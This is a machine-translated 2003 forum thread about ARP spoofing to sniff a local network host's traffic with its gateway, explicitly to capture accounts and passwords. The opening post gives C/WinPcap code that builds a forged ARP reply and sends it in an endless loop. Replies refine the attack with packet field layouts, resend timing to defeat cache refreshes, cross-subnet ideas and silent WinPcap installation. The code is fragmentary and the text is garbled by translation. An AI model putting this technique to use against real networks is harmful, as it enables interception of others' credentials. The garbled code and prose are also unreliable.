Nethorse
Published in: 2003-12-10 14:11 Reposted: 47 Points: 0 Registration: 2003-02-12 Talk to the use of ARP spoofing to achieve sniffing with host a, b, c in the same local area network, and gateway G. A, C is the host to listen to, B is our machine. The current implementation of most tools is to deceive A and the MAC of the host C other than the A communication, which can monitor their communication. But in fact, in most cases, we are interested in communication with the gateway G, which is especially interested in some information, such as account, password, what data sent to A, we don't Too care. So in this case, there is no need to deceive the gateway G (tell G, a MAC B). Only deceive a host, telling it the MAC of the gateway G. In this way, the communication between A and G is this: a -------> B ------> GA <---------------- G Obviously, if the data sent and received is comparable, then B's data is almost half, and of course, the burden of network bandwidth and B host will also save.
The code implemented in the XP VC6.0 platform and the deceived host is also XP (this machine needs to open IP routing function): # include
Packet [4] = 0x00; packet [5] = 0x00; / * mac of Your host * / packet [6] = 0x00; packet [7] = 0x00; packet [8] = 0x00; packet [9] = 0x00; Packet [10] = 0x00; Packet [11] = 0x00; / * set the protocol type * / packet [12] = 8; packet [13] = 6; / * set the hard and protocol type * / packet [14] = 0; packet [15] = 1; packet [16] = 8; packet [17] = 0; / * set the length * / packet [18] = 6; packet [19] = 4; / * set the Operation TYPE * / PACKET [20] = 0; packet [21] = 2; / * mac of Your host * / packet [22] = 0x00; packet [23] = 0x00; packet [24] = 0x00; packet [25] = 0x00; packet [26] = 0x00; packet [27] = 0x00; / * ip of the gateway * / packet [28] = 0; packet [29] = 0; packet [30] = 0; packet [31] = 0; / * Mac of the target [32] = 0x00; packet [33] = 0x00; packet [34] = 0x00; packet [35] = 0x00; packet [36] = 0x00; Packet [37] = 0x00; / * ip of the target you want to spoof * / packet [38] = 0 packet [39] = 0; packet [40] = 0; PAC KET [41] = 0; / * Fill the rest of the packet * / for (i = 42; i <60; i ) {packet [i] = 0;} / * send down the packet * / while (1) {Sleep (2000); PCAP_SENDPACKET (FP, Packet, 60);} Return 0;} Attach: How to implement ARP spoof, it is likely that different networks do not have a certain rule. I am using the XPSP1 professional version. If the sender is not a gateway for ARP Replend, IP does not update the ARP cache, and the program is exactly the IP of the gateway. Nethorse Edited from 2003-12-10 14:15 --- I don't have a laptop, I want to have a!
Love1983
Published in: 2003-12-11 03:30 Reply Posting: 163 Points: 0 Registration: 2003-08-16 Collection Learning ing
--- Life and study should be passionate, otherwise you can't experience the fullest joy and pain
PRFONE
Published in: 2003-12-11 08:25 Reply Posting: 812 Points: 0 Registration: 2002-01-11 If g -----> A frequent communication frequently, then a ARP cache Gateway IP and Mac The corresponding relationship will change between the Mac and IP <---> g of IP <-> B, causing a ---> b ---> g of communication, not very smooth, don't know you Have you met? --- The edge of the edge is self-contained. . .
Nethorse
Published in: 2003-12-11 08:43 Reply Posting: 47 Points: 0 Registration: 2003-02-12
Quote (prfone @ 2003-12-11 08:25)
If the communication of G -----> A frequently occurs, the correspondence between the gateway IP and Mac in the ARP cache will continue between IP <-> B Mac and IP <---> g Change, leading to a ---> b ---> G communication is not very smooth, don't you know if you met?
The normal communication of g ----> A does not change the correspondence between the gateway IP and Mac in the ARP cache, unless G sends ARP requests. But after the Sniffer discovery (in my LAN, different local area networks may be different), and G send ARP requests are not frequent, and we can adjust the interval time of deceiving the A hair pack. Even during this period, the correspondence between the gateway IP and Mac in the ARP cache will constantly change between the MAC of IP <-> B and IP <---> g, because the ARP is just a link layer protocol, Normal communication between A and G has no effect. Just B occasionally a few datagrams sent by the A.
--- I don't have a laptop, I want to have one!
PRFONE
Published in: 2003-12-11 09:24 Reply Posting: 812 Points: 0 Registration: 2002-01-11 My LAN Gateway is a Linux PC, I found that he will send ARP request very often, do not know its ARP Is the cache time no effect, I don't know what system is your gateway?
--- The edge of the edge is self-contained. . .
PRFONE
Published in: 2003-12-11 09:34 Reply Posting: 812 Points: 0 Registration: 2002-01-11 When the entire local area network is busy, such as gateway g needs to resolve another LAN machine D Mac, G will broadcast ARP request, then A will also receive the request of G, which compares the corresponding relationship between G and Mac, discovers the Mac of the G's IP -> B, updates the ARP cache. In this way, the correspondence between the ARP buffer G is not changed?
--- The edge of the edge is self-contained. . .
XMHP
Published in: 2003-12-12 09:45 Reply Posting: 79 Points: 0 Registration: 2002-07-09 Under the same subnet, ARP spoof can succeed. But how do I ARP in different sublines deceived? FOLLOW
Published in: 2003-12-13 16:48 Reply Posting: 113 Points: 0 Registration: 2003-01-04 It is said that you can try it with ICMP redirection, you have time to try.
--- Listening to the spring rain overnight overnight, the depths of the departure will sell apricots.
yiedu
Published in: 2003-12-17 13:49 Reply Posting: 446 Points: 0 Registration: 2003-03-25ARP Sparkling Principles everyone knows, but some details have not pointed out that PRFONE's problem is very typical. I have also encountered similar problems. The reason has been unclear. Say that I also hope that everyone is still the same. First, I have already deceive A and observe the Mac in the cached table in the caching table, it is really already mac, but A is not able to capture a packet of A when I use IE Internet. Know why? The description B has been set to a mixed mode. Possible cause: A When the connection request is established, the ARP request is sent to the gateway, so the cache will be changed immediately. Even if I deceive the speed on B is very fast. There is also a phenomenon: When a A to send a packet to an IP in the intranet, B can capture the data of the word a. When I use IE, I can't catch it, it is very strange? --- Nostalgic lights, deciduous, and an old guitar sound. I have loved the girl who didn't have the courage to show you, are you ok?
PRFONE
Published in: 2003-12-17 14:12 Reply Posting: 812 Points: 0 Registration: 2002-01-11YIEDU, What is your truly router? Cisco's? You can analyze A's ARP package through captain!
--- The edge of the edge is self-contained. . .
FFantasyd
Published in: 2003-12-17 16:49 Reply Posting: 61 Points: 0 Registration: 2003-09-19 Follow YieEDu
--- Chongqing Network Security Group Tiger League Network Security Group My Homepage
Xtiger
Published in: 2003-12-17 18:04 Reply Posting: 139 Points: 0 Registration: 2002-10-25
Quote (YieEDU @ 2003-12-17 13:49)
The principle of ARP deception knows, but some details of some details have not pointed out that PRFONE's problem is typical, I have also encountered similar problems. The reason has been unclear. Say that I also hope that everyone is still the same. First, I have already deceive A and observe the Mac in the cached table in the caching table, it is really already mac, but A is not able to capture a packet of A when I use IE Internet. Know why? The description B has been set to a mixed mode. Possible cause: A When the connection request is established, the ARP request is sent to the gateway, so the cache will be changed immediately. Even if I deceive the speed on B is very fast. There is also a phenomenon: When a A to send a packet to an IP in the intranet, B can capture the data of the word a. When I use IE, I can't catch it, it is very strange?
Look at it, it seems to have encountered a similar situation. Take a toss. The real ArpspoOf should be full of work, not semi-working. Only in this way ensures that the transfer of the entire data stream is smooth. And you are narrative, just in line with the phenomenon of semi-working. Xtiger Edited from 2003-12-17 18:47 Sparrow1
Published in: 2003-12-17 20:21 Reply Posting: 52 Points: 0 Registration: 2003-10-26 Follow YIEDU's question, and recommend to grab a package of A and carefully analyze the reason. In addition, the full duplex mentioned by Xtiger does not refer to two-way deceptive and forwarding? I think this can guarantee the integrity of the data communication. I didn't have a specific trial, but I saw the "ARP Agreement revealed" on the first page of the first two days to understand, I hope that ISXIAOBAI
Published in: 2003-12-18 01:25 Reply Posting: 40 Points: 0 Registration: 2003-11-16 Quote (Yiedu @ 2003-12-17 13:49)
The principle of ARP deception knows, but some details of some details have not pointed out that PRFONE's problem is typical, I have also encountered similar problems. The reason has been unclear. Say that I also hope that everyone is still the same. First, I have already deceive A and observe the Mac in the cached table in the caching table, it is really already mac, but A is not able to capture a packet of A when I use IE Internet. Know why? The description B has been set to a mixed mode. Possible cause: A When the connection request is established, the ARP request is sent to the gateway, so the cache will be changed immediately. Even if I deceive the speed on B is very fast. There is also a phenomenon: When a A to send a packet to an IP in the intranet, B can capture the data of the word a. When I use IE, I can't catch it, it is very strange?
YIEDU, on your question, I talk about my opinion, my problem I have encountered, it is when successfully deceiving a host and gateway, using SNIFF can get the gateway to send to the host, but not Data reported to the host. However, I solved later. In fact, this is the case, it is definitely your program, that is, you have a problem with the ARP package you sent to the host. The ARP package sent to the target host should be the following way: first is physical head: Host Mac Native Mac 0806 (ARP TYPE) then is ARP header, this other is not important, I said the number of addresses are filled in: where Sender's hardware address is this machine Mac, Sender's IP address is the gateway IP ** ( Mainly this) Target's Hardware Address is the target host Mac, Sender's IP address as the target host IP as long as these fills, then you will definitely receive all the packets of the other host. There is a reason for the problem of receiving the packets issued by the host, I think it is the reason for your program. The first question, there is also a problem in the program. Later, I have been investigated for a long time. I found that I've caught the ARP package. Therefore, the ARP package sent to the host cannot let it redirect, and send it to the gateway No problem, so, only part of the datagram, is the gateway. It is recommended that you check the ARP list of the target host. Look, the physical address of the corresponding gateway IP address is your Mac, if not, that is, there is no deception, then it is definitely the problem of ARP. My thoughts are like this, Yiedu, if you still have not solved, you can talk to me. In addition, talking about my network environment is: a Cisco Catalyst 1900 switch two hosts are Windows 2K Pro operating systems. My program sends an ARP package to the gateway and the target host. I spent two hours of adjusting the ARP spoofing procedure, it's two, it seems that I have to do it, huh, huh btw: xiaobai this ID still didn't find it, I have to use Isxiaobai vest to be filled, just good day Cold, hey, dear SAN, when can I find you, I want my ID? ? ISXIAobai Edited by ISXIAobai Posted: 2003-12-18 02:32 Reposted: 40 Points: 40 Points: 0 Registration: 2003-11-16
Quote (prfone @ 2003-12-11 09:24)
My LAN gateway is a Linux PC. I found that he will send ARP request very frequently. I don't know if it's ARP cache time is nothing. I don't know what system is your gateway?
Old brother, I also want to mention a little idea to you, I also do the procedure of ARP deception, find that the other host will automatically refresh your ARP cache, of course, I It's all 2K system, I am a blind, hey. So, no matter how often your gateway is refreshed, you can guarantee the target host to send data by you as long as it is fast. As long as you keep sending the ARP package, let the other party update, you can. About the format of the ARP package, I wrote it on the top of Yiedu. By the way, many ARP programs on the Internet are a bit problem. I have some Yiedu mentioned questions. You have to check it carefully to check the ARP package to the bottom is what we want, huh, huh. Isxiaobai Posted: 2003-12-18 07:46 Reply Posting: 40 Points: 40 Points: 2003-11-16 Borrowing this post, By the way, ask the question I have encountered, I use WinPcap to realize ARP deception, success. It also caught the data packets that don't deceive the host with IRIs. Since I used to write a Sniff tool implemented with SockRaw, I was too lazy to write the code, I passed directly. In fact, after using WinPCAP, use SockRaw to grab the data package, but the problem is here, I didn't expect WinPcap to conflict with SockRaw, two of the two, and the dead blue screen. Do you have this situation, how to solve it? ? Incident, there is a problem, which is Winpcap, how can I use my own program to install WinPCap, without performing its graphical installer? Narcissus
Published in: 2003-12-18 08:35 Reply Posting: 5 Points: 0 Registration: 2003-12-11
Quote (isxiaobai @ 2003-12-18 02:32)
So, no matter how often your gateway is refreshed, you can guarantee the target host to send data by you as long as it is fast. As long as you keep sending the ARP package, let the other party update, you can.
No matter how fast your refresh is, there is still a gap in the middle. If it is the ARP package that receives the gateway in this gap, it is also a target machine in this gap, which is not a deception.
--- My intention is a Hero, one day he will step on the seven-color clouds to marry me, I guess the front, but I can't guess this ending ...
Isxiaobai
Published in: 2003-12-18 08:47 Reply Posting: 40 Points: 0 Registration: 2003-11-16 Oops, the gap is sure, but this is just a short period of time, most of the data report me It's still possible, more, but also does not affect the target machine, the ARP cache has no effect on the target, but it's just around me. Sparrow1
Published in: 2003-12-18 10:06 Reply Posting: 52 Points: 0 Registration: 2003-10-26isxiaobai, do you really all over? Pay attention to your body! Isxiaobai
Published in: 2003-12-18 10:14 Reply Posting: 40 Points: 0 Registration: 2003-11-16 Nothing, habit, PRFONE
Published in: 2003-12-18 11:21 Reply Posting: 812 Points: 0 Registration: 2002-01-111, use WinPCAP to modify your SNIFFER. 2, I think the NPF.sys driver is installed according to the service, copy the DLL to the system directory, it should be possible.
--- The edge of the edge is self-contained. . .
